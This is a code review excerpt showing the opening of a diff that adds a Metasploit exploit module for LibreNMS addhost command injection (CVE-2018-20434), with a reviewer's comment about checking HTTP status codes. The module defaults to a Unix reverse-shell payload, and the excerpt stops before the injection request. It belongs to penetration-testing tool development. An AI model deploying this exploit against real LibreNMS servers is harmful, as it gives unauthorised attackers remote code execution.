modules/exploits/linux/http/librenms_addhost_cmd_inject.rb

```diff
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreNMS addhost Command Injection',
+      'Description'    => %q(
+         This module exploits a command injection vulnerability in the open source
+         network management software known as LibreNMS. The community parameter used
+         in a POST request to the addhost functionality is unsanitized. This parameter
+         is later used as part of a shell command that gets passed to the popen function
+         in capture.inc.php, which can result in execution of arbitrary code.
+
+         This module requires authentication to LibreNMS first.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'mhaskar',       # Vulnerability discovery and PoC
+        'Shelby Pace'    # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-20434' ],
+          [ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],
+          [ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]
+        ],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Linux',
+            {
+              'Platform' => 'unix',
+              'DefaultOptions'  =>  { 'Payload' =>  'cmd/unix/reverse' }
+            }
+          ]
+        ],
+      'DisclosureDate' => "Dec 16 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
+      OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
+      OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
+    ])
+  end
+
+  def login
+    login_uri = normalize_uri(target_uri.path, 'login')
+    res = send_request_cgi('method' =>  'GET', 'uri'  =>  login_uri)
+    fail_with(Failure::NotFound, 'Failed to access the login page') unless res
```

Comment:
Maybe check for status code here as well. If a 404 is received this currently keeps going.